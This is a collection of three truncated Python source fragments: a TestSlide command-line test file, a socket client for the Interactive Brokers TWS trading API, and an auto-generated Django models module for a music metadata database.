self.argv.append("--fail-if-focused")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
" *focused example: AssertionError: Focused example not allowed with --fail-if-focused. Please remove the focus to allow the test to run.\n"
" skipped example: SKIP\n"
" unittest SkipTest: SKIP\n"
" nested context\n"
" passing nested example: PASS\n"
"tests.sample_tests.SampleTestCase\n"
" test_failing: AssertionError: Third\n"
" test_passing: PASS\n"
" test_skipped: SKIP\n"
"\n"
"Failures:\n"
),
)
def test_fail_fast(self):
"""
Stop execution when first example fails.
"""
self.argv.append("--fail-fast")
self.run_testslide(
expected_return_code=1,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" failing example: SimulatedFailure: test failure (extra)\n"
"\n"
"Failures:\n"
),
)
def test_text_filter(self):
"""
Execute only examples matching partial text filter.
"""
self.argv.append("--filter-text")
self.argv.append("nested context: passing nested ex")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" nested context\n"
" passing nested example: PASS\n"
"\n"
"Finished 1 example(s) in "
),
)
def test_regexp_filter(self):
"""
Execute only examples matching regex filter.
"""
self.argv.append("--filter-regex")
self.argv.append(".*passing nested.*")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" nested context\n"
" passing nested example: PASS\n"
"\n"
"Finished 1 example(s) in "
),
)
def test_exclude_regexp(self):
"""
Skip examples matching regex filter.
"""
self.argv.append("--exclude-regex")
self.argv.append(".*failing.*")
self.run_testslide(
expected_return_code=0,
expected_stdout_startswith=(
"top context\n"
" passing example: PASS\n"
" *focused example: PASS\n"
" skipped example: SKIP\n"
" unittest SkipTest: | |
'''Main connection to TWS client.
Defines the EClientSocket class, which implements a socket connection to
the TWS socket server, through which the entire API operates.
'''
from __future__ import with_statement
__copyright__ = "Copyright (c) 2008 <NAME>"
__version__ = "$Id$"
import tws._EClientErrors as _EClientErrors
from tws._EWrapper import EWrapper as _wrapper_factory
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Decorators to support package
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def synchronized(f):
'''Thread mutex-locking decorator.'''
assert (__import__("inspect").getargspec(f)[0][0] == "self")
def _synchronized_call(self, *args, **kwds):
assert hasattr(self, "mutex")
with self.mutex:
return f(self, *args, **kwds)
return _synchronized_call
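The decorator above serializes all calls through the instance's `mutex`. A self-contained sketch of the same pattern with a hypothetical `Counter` class (not part of this module):

```python
import threading

def synchronized(f):
    # Same idea as the decorator above: serialize calls through self.mutex.
    def _synchronized_call(self, *args, **kwds):
        with self.mutex:
            return f(self, *args, **kwds)
    return _synchronized_call

class Counter(object):
    def __init__(self):
        self.mutex = threading.RLock()
        self.value = 0

    @synchronized
    def increment(self):
        self.value += 1

counter = Counter()
threads = [
    threading.Thread(target=lambda: [counter.increment() for _ in range(1000)])
    for _ in range(4)
]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter.value)
```

An `RLock` (rather than a plain `Lock`) matters here: one synchronized method can call another on the same instance without deadlocking.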
def requestmethod(has_id=False, min_server=0,
min_server_error_suffix="",
generic_error=_EClientErrors.TwsError(),
generic_error_suffix=""):
'''Socket request-method decorator.
Eliminates repetitive error-checking boilerplate from request methods.
'''
assert isinstance(has_id, bool)
assert isinstance(min_server, int)
assert isinstance(min_server_error_suffix, str)
assert isinstance(generic_error, _EClientErrors.TwsError)
assert isinstance(generic_error_suffix, str)
def _decorator(method):
assert (__import__("inspect").getargspec(method)[0][0] == "self")
#assert ((not has_id) or (__import__("inspect").getargspec(method)[0][1] == "id"))
def _decorated(self, *args, **kwds):
assert isinstance(self, EClientSocket)
try:
# Socket client must be connected.
if not self._connected:
self._error(_EClientErrors.NOT_CONNECTED)
return
# Enforce minimum server version, if any.
if self._server_version < min_server:
self._error(_EClientErrors.TwsError(
id=kwds.get("id", args[0] if args else _EClientErrors.NO_VALID_ID)
if has_id else _EClientErrors.NO_VALID_ID,
source=_EClientErrors.UPDATE_TWS,
msg=min_server_error_suffix or None))
return
# Call wrapped method, ensuring stream gets flushed.
result = method(self, *args, **kwds)
self._stream.flush()
return result
# Reraise assertion errors.
except AssertionError: raise
            # Report any other exception as a generic error via self._error().
except:
self._error(_EClientErrors.TwsError(
source=generic_error,
id=kwds.get("id", args[0] if args else _EClientErrors.NO_VALID_ID)
if has_id else _EClientErrors.NO_VALID_ID,
msg=generic_error_suffix or method.__name__))
self._close()
return _decorated
return _decorator
class EClientSocket(object):
'''Socket client which connects to the TWS socket server.
'''
from socket import socket as _socket_factory
def __init__(self, wrapper=None):
assert isinstance(wrapper, __import__("tws").EWrapper) or wrapper is None
if wrapper is None:
wrapper = _wrapper_factory()
if wrapper.client:
raise ValueError("Wrapper object is already assigned to a SocketClient.")
self._mutex = __import__("threading").RLock()
self._wrapper = wrapper
self._reader = None
self._connected = False
self._server_version = 0
self._tws_time = 0
self._wrapper._client = self
@synchronized
def _close(self):
assert self._connected
try:
self.eDisconnect()
finally:
self._wrapper.connectionClosed()
def _send(self, data):
if type(data) in (str, int, long, float):
self._stream.write(str(data))
elif type(data) == bool:
self._stream.write("1" if data else "0")
elif data is None:
pass
else:
            raise ValueError("Unknown data type for EClientSocket._send(): %s" % type(data))
self._stream.write(self.EOL)
def _sendMax(self, data):
if type(data) == int:
self._send(data) if data != self._INT_MAX_VALUE else self._send(None)
elif type(data) == float:
self._send(data) if data != self._DOUBLE_MAX_VALUE else self._send(None)
else:
            raise ValueError("Unknown data type for EClientSocket._sendMax(): %s" % type(data))
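Taken together, `_send()` and `EOL` implement a NUL-terminated field encoding: each value is written as its string form followed by `"\x00"`, booleans as `"1"`/`"0"`, and `None` as an empty field. A standalone sketch of that encoding (the `send` helper here is illustrative, not the class method):

```python
import io

EOL = "\x00"  # field terminator used on the wire

def send(stream, data):
    # Check bool before int: isinstance(True, int) is True in Python.
    if isinstance(data, bool):
        stream.write("1" if data else "0")
    elif isinstance(data, (str, int, float)):
        stream.write(str(data))
    elif data is not None:
        raise ValueError("Unknown data type: %s" % type(data))
    stream.write(EOL)

buf = io.StringIO()
for field in [1, "MSFT", True, None]:
    send(buf, field)
print(repr(buf.getvalue()))
```

`_sendMax()` builds on this by treating the sentinel values `_INT_MAX_VALUE` and `_DOUBLE_MAX_VALUE` as "unset", sending them as empty fields.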
@synchronized
def _error(self, e):
self._wrapper.error(e)
@classmethod
def faMsgTypeName(cls, faDataType):
if faDataType == cls.GROUPS:
return "GROUPS"
elif faDataType == cls.PROFILES:
return "PROFILES"
elif faDataType == cls.ALIASES:
return "ALIASES"
# Should never get here.
assert False
return ""
# General constants
CLIENT_VERSION = 48
SERVER_VERSION = 38
EOL = "\x00"
BAG_SEC_TYPE = "BAG"
# API tag constants
REQ_MKT_DATA = 1
CANCEL_MKT_DATA = 2
PLACE_ORDER = 3
CANCEL_ORDER = 4
REQ_OPEN_ORDERS = 5
REQ_ACCOUNT_DATA = 6
REQ_EXECUTIONS = 7
REQ_IDS = 8
REQ_CONTRACT_DATA = 9
REQ_MKT_DEPTH = 10
CANCEL_MKT_DEPTH = 11
REQ_NEWS_BULLETINS = 12
CANCEL_NEWS_BULLETINS = 13
SET_SERVER_LOGLEVEL = 14
REQ_AUTO_OPEN_ORDERS = 15
REQ_ALL_OPEN_ORDERS = 16
REQ_MANAGED_ACCTS = 17
REQ_FA = 18
REPLACE_FA = 19
REQ_HISTORICAL_DATA = 20
EXERCISE_OPTIONS = 21
REQ_SCANNER_SUBSCRIPTION = 22
CANCEL_SCANNER_SUBSCRIPTION = 23
REQ_SCANNER_PARAMETERS = 24
CANCEL_HISTORICAL_DATA = 25
REQ_CURRENT_TIME = 49
REQ_REAL_TIME_BARS = 50
CANCEL_REAL_TIME_BARS = 51
REQ_FUNDAMENTAL_DATA = 52
CANCEL_FUNDAMENTAL_DATA = 53
REQ_CALC_IMPLIED_VOLAT = 54
REQ_CALC_OPTION_PRICE = 55
CANCEL_CALC_IMPLIED_VOLAT = 56
CANCEL_CALC_OPTION_PRICE = 57
REQ_GLOBAL_CANCEL = 58
MIN_SERVER_VER_REAL_TIME_BARS = 34
MIN_SERVER_VER_SCALE_ORDERS = 35
MIN_SERVER_VER_SNAPSHOT_MKT_DATA = 35
MIN_SERVER_VER_SSHORT_COMBO_LEGS = 35
MIN_SERVER_VER_WHAT_IF_ORDERS = 36
MIN_SERVER_VER_CONTRACT_CONID = 37
MIN_SERVER_VER_PTA_ORDERS = 39
MIN_SERVER_VER_FUNDAMENTAL_DATA = 40
MIN_SERVER_VER_UNDER_COMP = 40
MIN_SERVER_VER_CONTRACT_DATA_CHAIN = 40
MIN_SERVER_VER_SCALE_ORDERS2 = 40
MIN_SERVER_VER_ALGO_ORDERS = 41
MIN_SERVER_VER_EXECUTION_DATA_CHAIN = 42
MIN_SERVER_VER_NOT_HELD = 44
MIN_SERVER_VER_SEC_ID_TYPE = 45
MIN_SERVER_VER_PLACE_ORDER_CONID = 46
MIN_SERVER_VER_REQ_MKT_DATA_CONID = 47
MIN_SERVER_VER_REQ_CALC_IMPLIED_VOLAT = 49
MIN_SERVER_VER_REQ_CALC_OPTION_PRICE = 50
MIN_SERVER_VER_CANCEL_CALC_IMPLIED_VOLAT = 50
MIN_SERVER_VER_CANCEL_CALC_OPTION_PRICE = 50
MIN_SERVER_VER_SSHORTX_OLD = 51
MIN_SERVER_VER_SSHORTX = 52
MIN_SERVER_VER_REQ_GLOBAL_CANCEL = 53
# Message Type name constants
GROUPS = 1
PROFILES = 2
ALIASES = 3
# Private class imports
from tws._Util import _INT_MAX_VALUE
from tws._Util import _DOUBLE_MAX_VALUE
@property
def mutex(self):
'''Mutex for client thread synchronization.'''
return self._mutex
def wrapper(self):
return self._wrapper
def reader(self):
return self._reader
def isConnected(self):
return self._connected
def serverVersion(self):
return self._server_version
def TwsConnectionTime(self):
return self._tws_time
def checkConnected(self, host):
        assert isinstance(host, str) or (host is None)
if self._connected:
self._wrapper.error(_EClientErrors.ALREADY_CONNECTED)
return None
return host if host else "127.0.0.1"
def connectionError(self):
self._wrapper.error(_EClientErrors.CONNECT_FAIL)
self._reader = None
def createReader(self, input_stream):
assert hasattr(input_stream, "read")
return __import__("tws").EReader(self, input_stream)
@synchronized
def eConnect(self, client_id, stream=None, socket=None, host="", port=0,
negotiate=True, start_reader=True,
stdout=__import__("sys").stdout):
assert isinstance(client_id, int)
assert isinstance(negotiate, bool)
assert isinstance(start_reader, bool)
assert hasattr(stdout, "write") or not stdout
assert hasattr(stream, "read") or not stream
assert hasattr(socket, "makefile") or not socket
assert isinstance(host, str)
assert isinstance(port, int)
assert ((host or port) and not (socket or stream)) or ((not host) and (not port))
assert (socket and not stream) or (not socket)
if self._connected: return
if (host and port) and not socket:
socket = self._socket_factory()
socket.connect((host, port))
if socket and not stream:
stream = socket.makefile("r+")
socket.close() # Won't actually close until stream does.
self._stream = stream
self._reader = self.createReader(self._stream)
try:
self._connected = self._stream and not self._stream.closed
if negotiate:
if hasattr(self._stream, "seek"):
self._stream.seek(0, 2)
                self._send(self.CLIENT_VERSION)
                self._stream.flush()
                if hasattr(self._stream, "seek"):
                    self._stream.seek(0, 0)
                self._server_version = self._reader._readInt()
                if stdout:
                    stdout.write("Server Version: %d\n" % self._server_version)
if self._server_version < self.SERVER_VERSION:
self.eDisconnect()
self._wrapper.error(_EClientErrors.TwsError(source=_EClientErrors.UPDATE_TWS))
return
self._tws_time = self._reader._readStr()
if stdout:
stdout.write("TWS Time at connection: %s\n" % self._tws_time)
if hasattr(self._stream, "seek"):
self._stream.seek(0, 2)
self._send(client_id)
self._stream.flush()
if self._connected and start_reader:
self._reader.start()
except:
self.eDisconnect()
raise
@synchronized
def eDisconnect(self):
if not self._connected: return
self._connected = False
self._server_version = 0
self._tws_time = ""
try:
self._reader.interrupt()
assert self._stream.closed
finally:
self._reader = None
self._stream = None
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_CANSCANNER)
def cancelScannerSubscription(self, id):
assert isinstance(id, int)
VERSION = 1
self._send(self.CANCEL_SCANNER_SUBSCRIPTION)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_REQSCANNERPARAMETERS)
def reqScannerParameters(self):
VERSION = 1
self._send(self.REQ_SCANNER_PARAMETERS)
self._send(VERSION)
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support API scanner subscription.",
generic_error=_EClientErrors.FAIL_SEND_REQSCANNER)
def reqScannerSubscription(self, id, subscription):
assert isinstance(id, int)
assert isinstance(subscription, __import__("tws").ScannerSubscription)
VERSION = 3
self._send(self.REQ_SCANNER_SUBSCRIPTION)
self._send(VERSION)
self._send(id)
self._sendMax(subscription.numberOfRows())
self._send(subscription.instrument())
self._send(subscription.locationCode())
self._send(subscription.scanCode())
self._sendMax(subscription.abovePrice())
self._sendMax(subscription.belowPrice())
self._sendMax(subscription.aboveVolume())
self._sendMax(subscription.marketCapAbove())
self._sendMax(subscription.marketCapBelow())
self._send(subscription.moodyRatingAbove())
self._send(subscription.moodyRatingBelow())
self._send(subscription.spRatingAbove())
self._send(subscription.spRatingBelow())
self._send(subscription.maturityDateAbove())
self._send(subscription.maturityDateBelow())
self._sendMax(subscription.couponRateAbove())
self._sendMax(subscription.couponRateBelow())
self._send(subscription.excludeConvertible())
if self._server_version >= 25:
self._send(subscription.averageOptionVolumeAbove())
self._send(subscription.scannerSettingPairs())
if self._server_version >= 27:
self._send(subscription.stockTypeFilter())
@synchronized
@requestmethod(has_id=True,
generic_error=_EClientErrors.FAIL_SEND_REQMKT)
def reqMktData(self, id, contract, generic_tick_list, snapshot):
assert isinstance(id, int)
assert isinstance(contract, __import__("tws").Contract)
assert isinstance(generic_tick_list, str)
assert isinstance(snapshot, bool)
VERSION = 9
if contract.m_underComp and (self._server_version < self.MIN_SERVER_VER_UNDER_COMP):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support delta-neutral orders."))
return
if snapshot and (self._server_version < self.MIN_SERVER_VER_SNAPSHOT_MKT_DATA):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support snapshot market data requests."))
return
if contract.m_conId and (self._server_version < self.MIN_SERVER_VER_REQ_MKT_DATA_CONID):
self._error(_EClientErrors.TwsError( source=_EClientErrors.UPDATE_TWS,
id=id,
msg="It does not support conId parameter."))
return
self._send(self.REQ_MKT_DATA)
self._send(VERSION)
self._send(id)
        if self._server_version >= self.MIN_SERVER_VER_REQ_MKT_DATA_CONID:
            self._send(contract.m_conId)
self._send(contract.m_symbol)
self._send(contract.m_secType)
self._send(contract.m_expiry)
self._send(contract.m_strike)
self._send(contract.m_right)
if self._server_version >= 15:
self._send(contract.m_multiplier)
self._send(contract.m_exchange)
if self._server_version >= 14:
self._send(contract.m_primaryExch)
self._send(contract.m_currency)
if self._server_version >= 2:
self._send(contract.m_localSymbol)
if (self._server_version >= 8):
if self.BAG_SEC_TYPE.lower() == contract.m_secType.lower():
self._send(len(contract.m_comboLegs))
for leg in contract.m_comboLegs:
self._send(leg.m_conId)
self._send(leg.m_ratio)
self._send(leg.m_action)
self._send(leg.m_exchange)
if self._server_version >= self.MIN_SERVER_VER_UNDER_COMP:
self._send(bool(contract.m_underComp))
if contract.m_underComp:
self._send(contract.m_underComp.m_conId)
self._send(contract.m_underComp.m_delta)
self._send(contract.m_underComp.m_price)
if self._server_version >= 31:
self._send(generic_tick_list)
if self._server_version >= self.MIN_SERVER_VER_SNAPSHOT_MKT_DATA:
self._send(snapshot)
@synchronized
@requestmethod(has_id=True, min_server=24,
min_server_error_suffix="It does not support historical data query cancellation.",
generic_error=_EClientErrors.FAIL_SEND_CANHISTDATA)
def cancelHistoricalData(self, id):
assert isinstance(id, int)
VERSION = 1
self._send(self.CANCEL_HISTORICAL_DATA)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(has_id=True, min_server=MIN_SERVER_VER_REAL_TIME_BARS,
min_server_error_suffix="It does not support realtime bar data query cancellation.",
generic_error=_EClientErrors.FAIL_SEND_CANRTBARS)
def cancelRealTimeBars(self, id):
assert isinstance(id, int)
VERSION = 1
self._send(self.CANCEL_REAL_TIME_BARS)
self._send(VERSION)
self._send(id)
@synchronized
@requestmethod(has_id=True, min_server=16,
min_server_error_suffix="It does not support historical data backfill.",
generic_error=_EClientErrors.FAIL_SEND_REQHISTDATA)
def reqHistoricalData(self, id, contract, end_date_time, duration_str,
bar_size_setting, what_to_show, use_RTH, format_date):
assert isinstance(id, int)
assert isinstance(contract, __import__("tws").Contract)
assert isinstance(end_date_time, str)
assert isinstance(duration_str, str)
assert isinstance(bar_size_setting, str)
assert isinstance(what_to_show, str)
assert | |
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class AlternativeMedium(models.Model):
medium = models.IntegerField()
alternative_release = models.IntegerField()
name = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = False
db_table = 'alternative_medium'
class AlternativeMediumTrack(models.Model):
alternative_medium = models.IntegerField(primary_key=True)
track = models.IntegerField()
alternative_track = models.IntegerField()
class Meta:
managed = False
db_table = 'alternative_medium_track'
unique_together = (('alternative_medium', 'track'),)
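Django's `inspectdb` cannot express a composite primary key, so it marks the first column `primary_key=True` and records the real constraint in `Meta.unique_together` (hence the cleanup note at the top of this module). The underlying database constraint behaves like this sketch against an in-memory SQLite table with made-up rows:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    """
    CREATE TABLE alternative_medium_track (
        alternative_medium INTEGER,
        track INTEGER,
        alternative_track INTEGER,
        PRIMARY KEY (alternative_medium, track)
    )
    """
)
conn.execute("INSERT INTO alternative_medium_track VALUES (1, 1, 10)")
try:
    # Same (alternative_medium, track) pair: rejected by the composite key.
    conn.execute("INSERT INTO alternative_medium_track VALUES (1, 1, 11)")
    duplicate_allowed = True
except sqlite3.IntegrityError:
    duplicate_allowed = False
print(duplicate_allowed)
```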
class AlternativeRelease(models.Model):
gid = models.UUIDField()
release = models.IntegerField()
name = models.CharField(max_length=200, blank=True, null=True)
artist_credit = models.IntegerField(blank=True, null=True)
type = models.IntegerField()
language = models.IntegerField()
script = models.IntegerField()
comment = models.CharField(max_length=255)
class Meta:
managed = False
db_table = 'alternative_release'
class AlternativeReleaseType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'alternative_release_type'
class AlternativeTrack(models.Model):
name = models.CharField(max_length=200, blank=True, null=True)
artist_credit = models.IntegerField(blank=True, null=True)
ref_count = models.IntegerField()
class Meta:
managed = False
db_table = 'alternative_track'
class Annotation(models.Model):
editor = models.IntegerField()
text = models.TextField(blank=True, null=True)
changelog = models.CharField(max_length=255, blank=True, null=True)
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'annotation'
class Application(models.Model):
owner = models.IntegerField()
name = models.TextField()
oauth_id = models.TextField()
oauth_secret = models.TextField()
oauth_redirect_uri = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'application'
class Area(models.Model):
gid = models.UUIDField()
name = models.CharField(max_length=200)
type = models.IntegerField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
ended = models.BooleanField()
comment = models.CharField(max_length=255)
class Meta:
# managed = False
db_table = 'area'
def __str__(self):
return self.name
class AreaAlias(models.Model):
area = models.IntegerField()
name = models.CharField(max_length=200)
locale = models.TextField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
type = models.IntegerField(blank=True, null=True)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
primary_for_locale = models.BooleanField()
ended = models.BooleanField()
class Meta:
managed = False
db_table = 'area_alias'
class AreaAliasType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_alias_type'
class AreaAnnotation(models.Model):
area = models.IntegerField(primary_key=True)
annotation = models.IntegerField()
class Meta:
managed = False
db_table = 'area_annotation'
unique_together = (('area', 'annotation'),)
class AreaAttribute(models.Model):
area = models.IntegerField()
area_attribute_type = models.IntegerField()
area_attribute_type_allowed_value = models.IntegerField(blank=True, null=True)
area_attribute_text = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_attribute'
class AreaAttributeType(models.Model):
name = models.CharField(max_length=255)
comment = models.CharField(max_length=255)
free_text = models.BooleanField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_attribute_type'
class AreaAttributeTypeAllowedValue(models.Model):
area_attribute_type = models.IntegerField()
value = models.TextField(blank=True, null=True)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_attribute_type_allowed_value'
class AreaGidRedirect(models.Model):
gid = models.UUIDField(primary_key=True)
new_id = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_gid_redirect'
class AreaTag(models.Model):
area = models.IntegerField(primary_key=True)
tag = models.IntegerField()
count = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'area_tag'
unique_together = (('area', 'tag'),)
class AreaTagRaw(models.Model):
area = models.IntegerField(primary_key=True)
editor = models.IntegerField()
tag = models.IntegerField()
is_upvote = models.BooleanField()
class Meta:
managed = False
db_table = 'area_tag_raw'
unique_together = (('area', 'editor', 'tag'),)
class AreaType(models.Model):
name = models.CharField(max_length=255)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'area_type'
class Artist(models.Model):
id = models.IntegerField(primary_key=True)
gid = models.UUIDField()
name = models.CharField(max_length=200)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
# type = models.IntegerField(blank=True, null=True)
type2 = models.ForeignKey('ArtistType', to_field='id', db_column='type', on_delete=models.CASCADE,
blank=True,
null=True)
# area = models.IntegerField(blank=True, null=True)
area = models.ForeignKey('Area', to_field='id', db_column='area', on_delete=models.CASCADE, blank=True, null=True)
# gender = models.IntegerField(blank=True, null=True)
gender = models.ForeignKey('Gender', to_field='id', db_column='gender', on_delete=models.CASCADE,
blank=True,
null=True)
comment = models.CharField(max_length=255)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
ended = models.BooleanField()
begin_area = models.IntegerField(blank=True, null=True)
end_area = models.IntegerField(blank=True, null=True)
def __str__(self):
return self.name
class Meta:
# managed = False
db_table = 'artist'
class ArtistAlias(models.Model):
artist = models.IntegerField()
name = models.CharField(max_length=200)
locale = models.TextField(blank=True, null=True)
edits_pending = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
type = models.IntegerField(blank=True, null=True)
sort_name = models.CharField(max_length=200)
begin_date_year = models.SmallIntegerField(blank=True, null=True)
begin_date_month = models.SmallIntegerField(blank=True, null=True)
begin_date_day = models.SmallIntegerField(blank=True, null=True)
end_date_year = models.SmallIntegerField(blank=True, null=True)
end_date_month = models.SmallIntegerField(blank=True, null=True)
end_date_day = models.SmallIntegerField(blank=True, null=True)
primary_for_locale = models.BooleanField()
ended = models.BooleanField()
class Meta:
managed = False
db_table = 'artist_alias'
class ArtistAliasType(models.Model):
name = models.TextField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'artist_alias_type'
class ArtistAnnotation(models.Model):
artist = models.IntegerField(primary_key=True)
annotation = models.IntegerField()
class Meta:
managed = False
db_table = 'artist_annotation'
unique_together = (('artist', 'annotation'),)
class ArtistAttribute(models.Model):
artist = models.IntegerField()
artist_attribute_type = models.IntegerField()
artist_attribute_type_allowed_value = models.IntegerField(blank=True, null=True)
artist_attribute_text = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_attribute'
class ArtistAttributeType(models.Model):
name = models.CharField(max_length=255)
comment = models.CharField(max_length=255)
free_text = models.BooleanField()
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
managed = False
db_table = 'artist_attribute_type'
class ArtistAttributeTypeAllowedValue(models.Model):
artist_attribute_type = models.IntegerField()
value = models.TextField(blank=True, null=True)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
# managed = False
db_table = 'artist_attribute_type_allowed_value'
class ArtistCredit(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=200)
artist_count = models.SmallIntegerField()
ref_count = models.IntegerField(blank=True, null=True)
created = models.DateTimeField(blank=True, null=True)
artist = models.ManyToManyField(Artist, through='ArtistCreditName')
def __str__(self):
return self.name
class Meta:
# managed = True
db_table = 'artist_credit'
class ArtistCreditName(models.Model):
# artist_credit = models.IntegerField(primary_key=True)
artist_credit = models.ForeignKey(ArtistCredit, on_delete=models.CASCADE)
position = models.SmallIntegerField()
# artist = models.IntegerField()
artist = models.ForeignKey(Artist, on_delete=models.CASCADE)
name = models.CharField(max_length=200)
join_phrase = models.TextField()
class Meta:
# managed = True
db_table = 'artist_credit_name'
unique_together = (('artist_credit', 'position', 'artist'),)
class ArtistGidRedirect(models.Model):
gid = models.UUIDField(primary_key=True)
new_id = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_gid_redirect'
class ArtistIpi(models.Model):
artist = models.IntegerField(primary_key=True)
ipi = models.CharField(max_length=11)
edits_pending = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
# managed = False
db_table = 'artist_ipi'
unique_together = (('artist', 'ipi'),)
class ArtistIsni(models.Model):
artist = models.IntegerField(primary_key=True)
isni = models.CharField(max_length=16)
edits_pending = models.IntegerField()
created = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_isni'
unique_together = (('artist', 'isni'),)
class ArtistMeta(models.Model):
id = models.IntegerField(primary_key=True)
rating = models.SmallIntegerField(blank=True, null=True)
rating_count = models.IntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_meta'
class ArtistRatingRaw(models.Model):
artist = models.IntegerField(primary_key=True)
editor = models.IntegerField()
rating = models.SmallIntegerField()
class Meta:
managed = False
db_table = 'artist_rating_raw'
unique_together = (('artist', 'editor'),)
class ArtistTag(models.Model):
artist = models.IntegerField(primary_key=True)
tag = models.IntegerField()
count = models.IntegerField()
last_updated = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'artist_tag'
unique_together = (('artist', 'tag'),)
class ArtistTagRaw(models.Model):
artist = models.IntegerField(primary_key=True)
editor = models.IntegerField()
tag = models.IntegerField()
is_upvote = models.BooleanField()
class Meta:
managed = False
db_table = 'artist_tag_raw'
unique_together = (('artist', 'editor', 'tag'),)
class ArtistType(models.Model):
name = models.CharField(max_length=255)
parent = models.IntegerField(blank=True, null=True)
child_order = models.IntegerField()
description = models.TextField(blank=True, null=True)
gid = models.UUIDField()
class Meta:
# managed = False
db_table = 'artist_type'
def __str__(self):
return self.name
class AuthGroup(models.Model):
name = models.CharField(unique=True, max_length=80)
class Meta:
managed = False
db_table = 'auth_group'
class AuthGroupPermissions(models.Model):
group = models.ForeignKey(AuthGroup, models.DO_NOTHING)
permission = models.ForeignKey('AuthPermission', models.DO_NOTHING)
class Meta:
managed = False
db_table = 'auth_group_permissions'
unique_together = (('group', 'permission'),)
class AuthPermission(models.Model):
name = models.CharField(max_length=255)
content_type = models.ForeignKey('DjangoContentType', models.DO_NOTHING)
codename = models.CharField(max_length=100)
class Meta:
managed = False
db_table = 'auth_permission'
unique_together = (('content_type', 'codename'),)
class AuthUser(models.Model):
password = models.CharField(max_length=128)
last_login = models.DateTimeField(blank=True, null=True)
